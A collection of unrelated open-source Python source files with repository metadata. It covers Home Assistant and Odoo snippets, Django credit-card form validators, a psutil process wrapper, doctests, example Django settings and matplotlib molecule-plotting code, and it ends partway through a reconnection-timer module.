# There is still another config entry for this domain, don't remove services.
return
if not hass.services.has_service(DOMAIN, SERVICE_SET_COLOR_MODE):
return
_LOGGER.info("Unloading ScreenLogic Services")
hass.services.async_remove(domain=DOMAIN, service=SERVICE_SET_COLOR_MODE)
|
rohitranjan1991/home-assistant
|
homeassistant/components/screenlogic/services.py
|
Python
|
mit
| 3,148
| 0.001906
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, _
from odoo.addons.http_routing.models.ir_http import url_for
class Website(models.Model):
_inherit = "website"
def get_suggested_controllers(self):
suggested_controllers = super(Website, self).get_suggested_controllers()
suggested_controllers.append((_('Events'), url_for('/event'), 'website_event'))
return suggested_controllers
|
ddico/odoo
|
addons/website_event/models/website.py
|
Python
|
agpl-3.0
| 491
| 0.004073
|
from unittest import TestCase
from netcontrol.util import singleton
@singleton
class SingletonClass(object):
pass
@singleton
class SingletonClassWithAttributes(object):
@classmethod
def setup_attributes(cls):
cls.value = 1
class SingletonTest(TestCase):
def test_that_only_instance_is_created(self):
obj_one = SingletonClass()
obj_two = SingletonClass()
self.assertIs(obj_one, obj_two)
def test_that_instance_is_created_using_setup_method(self):
obj = SingletonClassWithAttributes()
self.assertEqual(1, obj.value)
|
drimer/NetControl
|
netcontrol/test/util/test_singleton.py
|
Python
|
gpl-2.0
| 593
| 0.001686
|
import re
from datetime import date
from calendar import monthrange, IllegalMonthError
from django import forms
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
# from - https://github.com/bryanchow/django-creditcard-fields
CREDIT_CARD_RE = r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\d{11})$'
MONTH_FORMAT = getattr(settings, 'MONTH_FORMAT', '%b')
VERIFICATION_VALUE_RE = r'^([0-9]{3,4})$'
class CreditCardField(forms.CharField):
"""
Form field that validates credit card numbers.
"""
default_error_messages = {
'required': _(u'Please enter a credit card number.'),
'invalid': _(u'The credit card number you entered is invalid.'),
}
def clean(self, value):
value = value.replace(' ', '').replace('-', '')
if self.required and not value:
raise forms.util.ValidationError(self.error_messages['required'])
if value and not re.match(CREDIT_CARD_RE, value):
raise forms.util.ValidationError(self.error_messages['invalid'])
return value
class ExpiryDateWidget(forms.MultiWidget):
"""
Widget containing two select boxes for selecting the month and year.
"""
def decompress(self, value):
return [value.month, value.year] if value else [None, None]
def format_output(self, rendered_widgets):
return u'<div class="expirydatefield">%s</div>' % ' '.join(rendered_widgets)
class ExpiryDateField(forms.MultiValueField):
"""
Form field that validates credit card expiry dates.
"""
default_error_messages = {
'invalid_month': _(u'Please enter a valid month.'),
'invalid_year': _(u'Please enter a valid year.'),
'date_passed': _(u'This expiry date has passed.'),
}
def __init__(self, *args, **kwargs):
today = date.today()
error_messages = self.default_error_messages.copy()
if 'error_messages' in kwargs:
error_messages.update(kwargs['error_messages'])
if 'initial' not in kwargs:
# Set default expiry date based on current month and year
kwargs['initial'] = today
months = [(x, '%02d (%s)' % (x, date(2000, x, 1).strftime(MONTH_FORMAT))) for x in xrange(1, 13)]
years = [(x, x) for x in xrange(today.year, today.year + 15)]
fields = (
forms.ChoiceField(choices=months, error_messages={'invalid': error_messages['invalid_month']}),
forms.ChoiceField(choices=years, error_messages={'invalid': error_messages['invalid_year']}),
)
super(ExpiryDateField, self).__init__(fields, *args, **kwargs)
self.widget = ExpiryDateWidget(widgets=[fields[0].widget, fields[1].widget])
def clean(self, value):
expiry_date = super(ExpiryDateField, self).clean(value)
if date.today() > expiry_date:
raise forms.ValidationError(self.error_messages['date_passed'])
return expiry_date
def compress(self, data_list):
if data_list:
try:
month = int(data_list[0])
except (ValueError, TypeError):
raise forms.ValidationError(self.error_messages['invalid_month'])
try:
year = int(data_list[1])
except (ValueError, TypeError):
raise forms.ValidationError(self.error_messages['invalid_year'])
try:
day = monthrange(year, month)[1] # last day of the month
except IllegalMonthError:
raise forms.ValidationError(self.error_messages['invalid_month'])
except ValueError:
raise forms.ValidationError(self.error_messages['invalid_year'])
return date(year, month, day)
return None
class VerificationValueField(forms.CharField):
"""
Form field that validates credit card verification values (e.g. CVV2).
See http://en.wikipedia.org/wiki/Card_Security_Code
"""
widget = forms.TextInput(attrs={'maxlength': 4})
default_error_messages = {
'required': _(u'Please enter the three- or four-digit verification code for your credit card.'),
'invalid': _(u'The verification value you entered is invalid.'),
}
def clean(self, value):
value = value.replace(' ', '')
if not value and self.required:
raise forms.util.ValidationError(self.error_messages['required'])
if value and not re.match(VERIFICATION_VALUE_RE, value):
raise forms.util.ValidationError(self.error_messages['invalid'])
return value
|
jumoconnect/openjumo
|
jumodjango/etc/credit_card_fields.py
|
Python
|
mit
| 4,687
| 0.00256
|
#-*- coding: utf-8 -*-
# processes.py
# Module providing informations about processes
#
# Copyright (C) 2016 Jakub Kadlcik
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
from .collections import ProcessesCollection
from .FilenameCleaner import FilenameCleaner
import psutil
import datetime
import time
import os
import re
from subprocess import PIPE, Popen
from threading import Timer
from six import with_metaclass
class Processes(object):
# psutil 3.x to 1.x backward compatibility
@staticmethod
def pids():
try:
return psutil.pids()
except AttributeError:
return psutil.get_pid_list()
@staticmethod
def all():
processes = ProcessesCollection()
for pid in Processes.pids():
try:
processes.append(Process(pid))
except psutil.NoSuchProcess: pass
except psutil.AccessDenied: pass
return processes
class ProcessWrapper(object):
"""
Wrapper for ``psutil.Process class``
Library ``psutil`` is not backward compatible from version 2.x.x to 1.x.x.
Purpose of this class is cover incompatibility in ``psutil.Process`` class and
provide interface of new version. It allows using new interface even with
old version of ``psutil``.
Note that, for performance reasons, process information is cached at
object creation. To force a refresh, invoke the ``rebuild_cache()``
method.
"""
def __init__(self, pid=None):
self._process = psutil.Process(pid)
self.rebuild_cache()
def __nonzero__(self):
return bool(self._process)
def rebuild_cache(self):
self._procdict = self._process.as_dict(attrs=['name', 'exe', 'cmdline', 'ppid', 'username', 'create_time'])
def name(self):
# Special case for sshd, if its cmd contains the execuatable is must be the daemon
# else must be the session.
try:
if self._attr("name") == 'sshd':
if self._attr("exe") not in self._attr("cmdline") and len(self._attr("cmdline")) > 1:
return 'ssh-{0}-session'.format(re.split(' |@',' '.join(self._attr("cmdline")))[1])
except psutil.AccessDenied:
pass
return self._attr("name")
def exe(self):
return self._attr("exe")
def cmdline(self):
return self._attr("cmdline")
def ppid(self):
return self._attr("ppid")
def parent(self):
return self._attr("parent")
def username(self):
return self._attr("username")
def create_time(self):
return self._attr("create_time")
def children(self, recursive=False):
key = 'children-{0}'.format(recursive)
if key not in self._procdict:
try:
self._procdict[key] = self._process.children(recursive)
except AttributeError:
self._procdict[key] = self._process.get_children(recursive)
return self._procdict[key]
def _attr(self, name):
if name not in self._procdict:
attr = getattr(self._process, name)
try:
self._procdict[name] = attr()
except TypeError:
self._procdict[name] = attr
return self._procdict[name]
def __getattr__(self, item):
return getattr(self._process, item)
# psutil 3.x to 1.x backward compatibility
def memory_maps(self, grouped=True):
key = 'memory_maps-{0}'.format(grouped)
if key not in self._procdict:
try:
self._procdict[key] = self._process.memory_maps(grouped=grouped)
except AttributeError:
self._procdict[key] = self._process.get_memory_maps(grouped=grouped)
return self._procdict[key]
class ProcessMeta(type):
"""
Caching metaclass that ensures that only one ``Process`` object is ever
instantiated for any given PID. The cache can be cleared by calling
``Process.reset_cache()``.
Based on https://stackoverflow.com/a/33458129
"""
def __init__(cls, name, bases, attributes):
super(ProcessMeta, cls).__init__(name, bases, attributes)
def reset_cache():
cls._cache = {}
reset_cache()
setattr(cls, 'reset_cache', reset_cache)
def __call__(cls, *args, **kwargs):
pid = args[0]
if pid not in cls._cache:
self = cls.__new__(cls, *args, **kwargs)
cls.__init__(self, *args, **kwargs)
cls._cache[pid] = self
return cls._cache[pid]
class Process(with_metaclass(ProcessMeta, ProcessWrapper)):
"""
Represent the process instance uniquely identifiable through PID
For all class properties and methods, please see
http://pythonhosted.org/psutil/#process-class
Below listed are only reimplemented ones.
For performance reasons, instances are cached based on PID, and
multiple instantiations of a ``Process`` object with the same PID will
return the same object. To clear the cache, invoke
``Process.reset_cache()``. Additionally, as with ``ProcessWrapper``,
process information is cached at object creation. To force a refresh,
invoke the ``rebuild_cache()`` method on the object.
"""
def __eq__(self, process):
"""For our purposes, two processes are equal when they have same name"""
return self.pid == process.pid
def __ne__(self, process):
return not self.__eq__(process)
def __hash__(self):
return hash(self.pid)
@staticmethod
def safe_isfile(file_path, timeout=0.5):
"""
Process arguments could be referring to files on remote filesystems and
os.path.isfile will hang forever if the shared FS is offline.
Instead, use a subprocess that we can time out if we can't reach some file.
"""
process = Popen(['test', '-f', file_path], stdout=PIPE, stderr=PIPE)
timer = Timer(timeout, process.kill)
try:
timer.start()
process.communicate()
return process.returncode == 0
finally:
timer.cancel()
@property
def files(self):
files = []
# Files from memory maps
for mmap in self.memory_maps():
files.append(FilenameCleaner.strip(mmap.path))
# Process arguments
for arg in self.cmdline()[1:]:
if not os.path.isabs(arg):
continue
if Process.safe_isfile(arg):
files.append(arg)
return sorted(files)
def parent(self):
"""The parent process casted from ``psutil.Process`` to tracer ``Process``"""
if self.ppid():
return Process(self.ppid())
return None
def username(self):
"""The user who owns the process. If user was deleted in the meantime,
``None`` is returned instead."""
# User who run the process can be deleted
try:
return super(Process, self).username()
except KeyError:
return None
def children(self, recursive=False):
"""The collection of process's children. Each of them casted from ``psutil.Process``
to tracer ``Process``."""
children = super(Process, self).children(recursive)
return ProcessesCollection([Process(child.pid) for child in children])
@property
def exe(self):
"""The absolute path to process executable. Cleaned from arbitrary strings
which appears on the end."""
# On Gentoo, there is #new after some files in lsof
# i.e. /usr/bin/gvim#new (deleted)
exe = super(Process, self).exe()
if exe.endswith('#new'):
exe = exe[0:-4]
# On Fedora, there is something like ;541350b3 after some files in lsof
if ';' in exe:
exe = exe[0:exe.index(';')]
return exe
@property
def is_interpreted(self):
# @TODO implement better detection of interpreted processes
return self.name() in ["python"]
@property
def is_session(self):
terminal = self.terminal()
if terminal is None:
return None
parent = self.parent()
if parent is None or terminal != parent.terminal():
return True
@property
def real_name(self):
if self.is_interpreted:
for arg in self.cmdline()[1:]:
if os.path.isfile(arg):
return os.path.basename(arg)
return self.name()
@property
def str_started_ago(self):
"""
The time of how long process is running. Returned as string
in format ``XX unit`` where unit is one of
``days`` | ``hours`` | ``minutes`` | ``seconds``
"""
now = datetime.datetime.fromtimestamp(time.time())
started = datetime.datetime.fromtimestamp(self.create_time())
started = now - started
started_str = ""
if started.days > 0:
started_str = str(started.days) + " days"
elif started.seconds >= 60 * 60:
started_str = str(int(started.seconds / (60 * 60))) + " hours"
elif started.seconds >= 60:
started_str = str(int(started.seconds / 60)) + " minutes"
elif started.seconds >= 0:
started_str = str(int(started.seconds)) + " seconds"
return started_str
class AffectedProcess(Process):
packages = None
files = None
def __init__(self, pid=None):
Process.__init__(self, pid)
self.packages = set()
self.files = set()
def update(self, process):
self.files = self.files.union(process.files)
self.packages = self.packages.union(process.packages)
|
FrostyX/tracer
|
tracer/resources/processes.py
|
Python
|
gpl-2.0
| 9,071
| 0.026127
|
#!/usr/bin/env python
#
# vim:syntax=python:sw=4:ts=4:expandtab
"""
test hasAttributes()
---------------------
>>> from guppy import hasAttributes
>>> class Foo(object):
... def __init__(self):
... self.a = 23
... self.b = 42
>>> hasAttributes('a')(Foo())
True
>>> hasAttributes('b')(Foo())
True
>>> hasAttributes('a', 'b')(Foo())
True
>>> hasAttributes('c')(Foo())
False
"""
"""
test hasMethods()
-----------------
>>> from guppy import hasMethods
>>> class Bar(object):
... def a(self): return 23
... def b(self): return 42
>>> hasMethods('a')(Bar())
True
>>> hasMethods('b')(Bar())
True
>>> hasMethods('b', 'a')(Bar())
True
>>> hasMethods('c')(Bar())
False
"""
"""
test isInstanceOf()
-------------------
>>> from guppy import isInstanceOf
>>> class BA(object): pass
>>> class BB(object): pass
>>> class C(BA, BB): pass
>>> isInstanceOf(str)("test")
True
>>> isInstanceOf(list)([1,2,3])
True
>>> isInstanceOf(dict)(dict(a = 23))
True
>>> isInstanceOf(BA, BB, C)(C())
True
>>> isInstanceOf(int)("test")
False
>>> isInstanceOf(list)("test")
False
>>> isInstanceOf(BB, C)(BA())
False
"""
"""
test implementProtocol()
------------------------
>>> from guppy import implementProtocol, Protocol
>>> class FooBarProtocol(Protocol):
... def foo(): pass
... def bar(): pass
>>> class SpamEggsProtocol(Protocol):
... def spam(): pass
... def eggs(): pass
>>> class AllProtocol(FooBarProtocol, SpamEggsProtocol): pass
>>> class FooBar(object):
... def foo(): pass
... def bar(): pass
>>> class SpamEggs(object):
... def spam(): pass
... def eggs(): pass
>>> class AllInherit(FooBar, SpamEggs): pass
>>> class All(object):
... def foo(): pass
... def bar(): pass
... def spam(): pass
... def eggs(): pass
>>> implementProtocol(FooBarProtocol)(FooBar())
True
>>> implementProtocol(SpamEggsProtocol)(FooBar())
False
>>> implementProtocol(AllProtocol)(FooBar())
False
>>> implementProtocol(SpamEggsProtocol)(SpamEggs())
True
>>> implementProtocol(FooBarProtocol)(SpamEggs())
False
>>> implementProtocol(AllProtocol)(SpamEggs())
False
>>> implementProtocol(SpamEggsProtocol)(All())
True
>>> implementProtocol(FooBarProtocol)(All())
True
>>> implementProtocol((SpamEggsProtocol, FooBarProtocol))(All())
True
>>> implementProtocol(AllProtocol)(All())
True
>>> implementProtocol(SpamEggsProtocol)(AllInherit())
True
>>> implementProtocol(FooBarProtocol)(AllInherit())
True
>>> implementProtocol((SpamEggsProtocol, FooBarProtocol))(AllInherit())
True
>>> implementProtocol(AllProtocol)(AllInherit())
True
>>> implementProtocol(SpamEggsProtocol)('')
False
>>> implementProtocol(FooBarProtocol)('')
False
>>> implementProtocol(AllProtocol)('')
False
>>> implementProtocol(str)('')
True
>>> implementProtocol(list)('')
False
>>> implementProtocol(list)([])
True
>>> implementProtocol(str)([])
False
>>> implementProtocol(dict)({})
True
>>> implementProtocol(list)({})
False
"""
|
xfire/guppy
|
test/doctest_assertions.py
|
Python
|
gpl-2.0
| 3,440
| 0
|
from tempfile import gettempdir
from os.path import join, dirname
import example_project
ADMINS = (
)
MANAGERS = ADMINS
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DISABLE_CACHE_TEMPLATE = DEBUG
DATABASE_ENGINE = 'sqlite3'
DATABASE_NAME = join(gettempdir(), 'django_ratings_example_project.db')
TEST_DATABASE_NAME =join(gettempdir(), 'test_django_ratings_example_project.db')
DATABASE_USER = ''
DATABASE_PASSWORD = ''
DATABASE_HOST = ''
DATABASE_PORT = ''
TIME_ZONE = 'Europe/Prague'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
# Make this unique, and don't share it with anybody.
SECRET_KEY = '88b-01f^x4lh$-s5-hdccnicekg07)niir2g6)93!0#k(=mfv$'
EMAIL_SUBJECT_PREFIX = 'Example project admin: '
# templates for this app
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DISABLE_CACHE_TEMPLATE = DEBUG
# TODO: Fix logging
# init logger
#LOGGING_CONFIG_FILE = join(dirname(testbed.__file__), 'settings', 'logger.ini')
#if isinstance(LOGGING_CONFIG_FILE, basestring) and isfile(LOGGING_CONFIG_FILE):
# logging.config.fileConfig(LOGGING_CONFIG_FILE)
# LOGGING_CONFIG_FILE = join( dirname(__file__), 'logger.conf')
# we want to reset whole cache in test
# until we do that, don't use cache
CACHE_BACKEND = 'dummy://'
# session expire
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# disable double render in admin
# DOUBLE_RENDER = False
MEDIA_ROOT = join(dirname(example_project.__file__), 'static')
MEDIA_URL = '/static/'
ADMIN_MEDIA_PREFIX = '/static/admin_media/'
|
ella/django-ratings
|
tests/example_project/settings/config.py
|
Python
|
bsd-3-clause
| 1,465
| 0.004778
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 22 14:18:45 2016
@author: Alex Kerr
Define functions that draw molecule objects.
"""
import copy
from itertools import cycle
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
from .molecule import chains
plt.close("all")
atomColors = {1:"white",6:"black",7:"skyblue",8:"red",9:"green",15:"orange",16:"yellow",17:"green",35:"orange",
21:"white", 22:"red", 23:"green", 24:"blue", 25:"orange"}
atomicRadii = {1:25,6:70,7:65,8:60,9:50,15:100,16:100,17:100,35:115,
21:120, 22:150, 23:190, 24:200, 25:210}
radList = np.zeros(max(list(atomicRadii.items()))[0]+1, dtype=np.int16)
for key,value in atomicRadii.items():
radList[key] = value
def bonds(molecule, sites=False, indices=False, faces=False, order=False,
atomtypes=False, linewidth=4.):
"""Draw a 2d 'overhead' view of a molecule."""
fig = plt.figure()
figTitle = molecule.name
posList = molecule.posList
length = len(molecule)
for bond in molecule.bondList:
i,j = bond
plt.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
plt.scatter(posList[:,0],posList[:,1],s=1.5*radList[molecule.zList],c=cList,
edgecolors='k')
if indices:
for index, pos in enumerate(molecule.posList):
plt.annotate(index, (pos[0]+.1, pos[1]+.1), color='b', fontsize=10)
if atomtypes:
for atomtype, pos in zip(molecule.atomtypes, molecule.posList):
plt.annotate(atomtype, (pos[0]-.5, pos[1]-.5), color='b', fontsize=10)
if faces:
for i,face in enumerate(molecule.faces):
openAtoms = [x for x in face.atoms if x not in face.closed]
plt.plot(face.pos[0],face.pos[1], 'rx', markersize=15., zorder=-2)
plt.scatter(posList[openAtoms][:,0], posList[openAtoms][:,1], s=75., c='red')
plt.scatter(posList[face.closed][:,0], posList[face.closed][:,1], s=40, c='purple')
plt.annotate(i, (face.pos[0]-.35*face.norm[0], face.pos[1]-.35*face.norm[1]),
color='r', fontsize=20)
if np.linalg.norm(face.norm[:2]) > 0.0001:
plt.quiver(face.pos[0]+.5*face.norm[0], face.pos[1]+.5*face.norm[1], 5.*face.norm[0], 5.*face.norm[1],
color='r', headwidth=1, units='width', width=5e-3, headlength=2.5)
if order:
for index, bo in enumerate(molecule.bondorder):
i,j = molecule.bondList[index]
midpoint = (molecule.posList[i]+molecule.posList[j])/2.
plt.annotate(bo, (midpoint[0], midpoint[1]), color='k', fontsize=20)
fig.suptitle(figTitle, fontsize=18)
plt.axis('equal')
plt.xlabel('x-position', fontsize=13)
plt.ylabel('y-position', fontsize=13)
plt.show()
def bondsax(molecule, ax, sites=False, indices=False, faces=False, order=False,
atomtypes=False, linewidth=4., size_scale=1.):
"""Draw a 2d 'overhead' view of a molecule."""
plt.sca(ax)
posList = molecule.posList
length = len(molecule)
for bond in molecule.bondList:
i,j = bond
plt.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
plt.scatter(posList[:,0],posList[:,1],s=1.5*radList[molecule.zList]*size_scale,c=cList,
edgecolors='k')
if indices:
for index, pos in enumerate(molecule.posList):
plt.annotate(index, (pos[0]+.1, pos[1]+.1), color='b', fontsize=10)
if atomtypes:
for atomtype, pos in zip(molecule.atomtypes, molecule.posList):
plt.annotate(atomtype, (pos[0]-.5, pos[1]-.5), color='b', fontsize=10)
if faces:
for i,face in enumerate(molecule.faces):
openAtoms = [x for x in face.atoms if x not in face.closed]
plt.plot(face.pos[0],face.pos[1], 'rx', markersize=15., zorder=-2)
plt.scatter(posList[openAtoms][:,0], posList[openAtoms][:,1], s=75., c='red')
plt.scatter(posList[face.closed][:,0], posList[face.closed][:,1], s=40, c='purple')
plt.annotate(i, (face.pos[0]-.35*face.norm[0], face.pos[1]-.35*face.norm[1]),
color='r', fontsize=20)
if np.linalg.norm(face.norm[:2]) > 0.0001:
plt.quiver(face.pos[0]+.5*face.norm[0], face.pos[1]+.5*face.norm[1], 5.*face.norm[0], 5.*face.norm[1],
color='r', headwidth=1, units='width', width=5e-3, headlength=2.5)
if order:
for index, bo in enumerate(molecule.bondorder):
i,j = molecule.bondList[index]
midpoint = (molecule.posList[i]+molecule.posList[j])/2.
plt.annotate(bo, (midpoint[0], midpoint[1]), color='k', fontsize=20)
plt.axis('equal')
plt.show()
def scatter_obj(size_scale, fs):
"""
Return a scatter object for legend purposes.
"""
fig, ax = plt.subplots()
x,y = [], []
c, s = [],[]
for i, z, name in zip(np.arange(6), [1,6,9,17,35], ['H', 'C', 'F', 'Cl', 'Br']):
x.append(0.)
y.append(-i*.2)
c.append(atomColors[z])
s.append(1.5*size_scale*radList[z])
ax.text(.005, -i*.2, name, fontsize=fs)
ax.scatter(x,y , c=c, s=s, edgecolors='k')
ax.axis('off')
def bonds3d(molecule, sites=False, indices=False, save=False,
linewidth=2.):
"""Draw the molecule's bonds
Keywords:
sites (bool): Set True to draw atomic sites. Default is False.
indices (bool): Set True to draw atomic site indices near atomic sites. Default is False."""
fig = plt.figure()
ax=Axes3D(fig)
figTitle = molecule.name
plotSize = 5
posList = molecule.posList/molecule.ff.lunits
length = len(posList)
for bond in molecule.bondList:
i,j = bond
ax.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
[posList[i][2],posList[j][2]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
ax.scatter(posList[:,0],posList[:,1],posList[:,2],
s=radList[molecule.zList],c=cList,
marker='o',depthshade=False,
edgecolors='k')
if indices:
ds = 0.1
for index,pos in enumerate(posList):
x,y,z = pos
ax.text(x+ds,y+ds,z+ds,str(index),color="blue")
fig.suptitle(figTitle, fontsize=18)
ax.grid(False)
ax._axis3don = False
ax.set_xlim3d(-plotSize,plotSize)
ax.set_ylim3d(-plotSize,plotSize)
ax.set_zlim3d(-plotSize,plotSize)
ax.set_xlabel('x-position' + ' (' + r'$\AA$' + ')')
ax.set_ylabel('y-position' + ' (' + r'$\AA$' + ')')
ax.set_zlabel('z-position' + ' (' + r'$\AA$' + ')')
if save:
plt.savefig("./kappa_save/%s.png" % molecule.name)
plt.show()
def bonds3d_list(molList, sites=False, indices=False, save=False,
linewidth=2.):
"""Draw the molecule's bonds
Keywords:
sites (bool): Set True to draw atomic sites. Default is False.
indices (bool): Set True to draw atomic site indices near atomic sites. Default is False."""
fig = plt.figure()
ax=Axes3D(fig)
plotSize = 5
for molecule in molList:
posList = molecule.posList/molecule.ff.lunits
length = len(posList)
for bond in molecule.bondList:
i,j = bond
ax.plot([posList[i][0],posList[j][0]],
[posList[i][1],posList[j][1]],
[posList[i][2],posList[j][2]],
color='k', zorder=-1, linewidth=linewidth)
cList = np.zeros([length,3])
if sites:
for count in range(len(molecule)):
cList[count] = colors.hex2color(colors.cnames[atomColors[molecule.zList[count]]])
ax.scatter(posList[:,0],posList[:,1],posList[:,2],
s=radList[molecule.zList],c=cList,
marker='o',depthshade=False,
edgecolors='k')
if indices:
ds = 0.1
for index,pos in enumerate(posList):
x,y,z = pos
ax.text(x+ds,y+ds,z+ds,str(index),color="blue")
ax.grid(False)
ax._axis3don = False
ax.set_xlim3d(-plotSize,plotSize)
ax.set_ylim3d(-plotSize,plotSize)
ax.set_zlim3d(-plotSize,plotSize)
ax.set_xlabel('x-position' + ' (' + r'$\AA$' + ')')
ax.set_ylabel('y-position' + ' (' + r'$\AA$' + ')')
ax.set_zlabel('z-position' + ' (' + r'$\AA$' + ')')
if save:
plt.savefig("./kappa_save/%s.png" % molecule.name)
plt.show()
def face(molecule, facenum):
"""Plot the given interface of the molecule"""
mol = copy.deepcopy(molecule)
face = mol.faces[facenum]
fig = plt.figure()
#rotate molecule to 'camera' position
axis = np.cross(face.norm, np.array([0.,0.,1.]))
mag = np.linalg.norm(axis)
if mag < 1e-10:
#check for parallel/anti-parallel
dot = np.dot(face.norm, np.array([0.,0.,1.]))
if dot < 0.:
#don't rotate
pass
if dot >0.:
#flip the molecule
mol.invert()
else:
angle = np.degrees(np.arcsin(mag))
mol.rotate(axis,angle)
#center interface
mol.translate(-face.pos)
plt.scatter(mol.posList[face.atoms][:,0], mol.posList[face.atoms][:,1], s=30., c='red')
ds = .2
# ds = np.full(len(face.atoms), ds)
# plt.text(mol.posList[face.atoms][:,0]+ds, mol.posList[face.atoms][:,1]+ds, str(face.atoms))
for atom in face.atoms:
plt.text(mol.posList[atom][0]+ds, mol.posList[atom][1]+ds, str(atom), color='blue')
fig.suptitle("Interface %s of %s" % (facenum, molecule), fontsize=18)
plt.axis('equal')
plt.show()
def faces(molecule):
for count in range(len(molecule.faces)):
face(molecule, count)
def normal_modes(mol,evec, track=None):
"""Draw a visualization of a normal mode of a molecule.
Keywords:
track (array-like): An array of indices to highlight in the plots.
Indices should be in '3*index' format to reflect direction."""
fig = plt.figure()
ax=Axes3D(fig)
length = len(mol)
ar = np.arange(length, dtype=int)
ax.scatter(mol.posList[:,0],mol.posList[:,1],mol.posList[:,2])
ax.quiver( mol.posList[:,0],mol.posList[:,1],mol.posList[:,2],
evec[3*ar].real, evec[3*ar + 1].real, evec[3*ar + 2].real, pivot='tail')
if track is not None:
for index in track:
atom = int(index/3.)
ax.scatter(mol.posList[atom,0], mol.posList[atom,1], mol.posList[atom,2],
s=100., c='red', zorder=-3)
point_index = index%3
point = np.array([0.,0.,0.])
point[point_index] = 1.
ax.quiver(mol.posList[atom,0], mol.posList[atom,1], mol.posList[atom,2],
point[0], point[1], point[2], pivot='tail', cmap='Reds', zorder=-2, lw=5.)
size = 12
ax.set_xlim3d(-size,size)
ax.set_ylim3d(-size,size)
ax.set_zlim3d(-size,size)
ax._axis3don = False
plt.show()
def density(val):
# density = gaussian_kde(val.flatten())
# x = np.linspace(-20, 20, 1000)
# density.covariance_factor = lambda: .25
# density._compute_covariance()
# plt.plot(x, density(x))
n, bins, patches = plt.hist(val.flatten(), bins=200)
plt.axis([-10000, 10000, 0, 1e6])
plt.show()
def participation(mol):
"""Plot the participation ratios of each normal mode as a function of their frequencies."""
fig = plt.figure()
from .operation import hessian, evecs
hess = hessian(mol)
val, vec = evecs(hess)
num = np.sum((vec**2), axis=0)**2
den = len(vec)*np.sum(vec**4, axis=0)
plt.scatter(val, num/den)
fig.suptitle("Participation ratios of %s" % mol.name)
plt.show()
def grid(values):
"""Plot a grid of values."""
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
colors = ['b', 'r', 'g', 'y']
xs = np.arange(values.shape[2])
count = 0
for block, c in zip(values, cycle(colors)):
for row in block:
ax.bar(xs, row, zs=count*2, zdir='y', color=c, alpha=.85)
count += 1
def kappa(filename, cid, dim, dimval, avg=False, legend=True):
"""Plot kappa values along a particular dimension."""
colors = ['b','r','y','c','m','g','k','w']
data = np.genfromtxt(filename,
dtype=[('kappa', 'f8'), ('cid', 'i4'),('clen','i4'),
('cnum','i4'), ('dbav', 'i4'), ('param1', 'i4'),
('param2', 'i4'), ('g', 'f8'), ('ff', 'S5'),
('indices', 'S30'), ('time','S16')], delimiter=";")
kappa = []
param = []
for datum in data:
if datum[0] < 0.:
continue
else:
kappa.append(datum[0])
param.append(list(datum)[1:7])
kappa = np.array(kappa)
param = np.array(param)
if dim.lower() == 'length':
index = 1
slice_ = 2
elif dim.lower() == 'num':
index = 2
slice_ = 1
else:
raise ValueError('Dimension string was invalid')
p = param[np.where(param[:,index]==dimval)[0],:]
kappa = kappa[np.where(param[:,index]==dimval)[0]]
for count, id_ in enumerate(cid):
idnum = chains.index(id_)
indices = np.where(p[:,0]==idnum)
vals = p[indices,slice_][0]
if avg is True:
marker = '-'
xy={}
for val, k in zip(vals,kappa[indices]):
try:
xy[val].append(k)
except KeyError:
xy[val] = [k]
x, y = [], []
for key in xy:
x.append(key)
y.append(np.average(xy[key]))
else:
marker = 'o'
x, y = vals, kappa[indices]
plt.figure(1)
plt.plot(x, y, colors[count]+marker,
label=id_, markersize=8, linewidth=3)
plt.figure(2)
plt.plot(x, np.cumsum(y), colors[count]+marker,
label=id_, markersize=8, linewidth=3)
plt.suptitle("Integrated Thermal Conductivity")
plt.figure(1)
plt.suptitle("Thermal conductivity vs. Chain Length", fontsize=18)
if legend:
plt.legend()
plt.figure(2)
plt.legend()
plt.xlabel("Chain Length (molecular units)", fontsize=15)
plt.ylabel("Integrated Driving Power", fontsize=15)
plt.figure(1)
plt.xlabel("Chain Length (molecular units)", fontsize=15)
plt.ylabel("Total Driving Power (ff units)", fontsize=15)
plt.show()
|
ajkerr0/kappa
|
kappa/plot.py
|
Python
|
mit
| 16,060
| 0.022167
|
from time import sleep
import math
__author__ = 'sergio'
## @package clitellum.endpoints.channels.reconnectiontimers
# Este paquete contiene las clases para los temporizadores de reconexion
#
## Metodo factoria que crea una instancia de un temporizador
# instantaneo
def CreateInstantTimer():
return InstantReconnectionTimer()
## Metodo factoria que crea una instancia de un temporizador
# logaritmico
def CreateLogarithmicTimer():
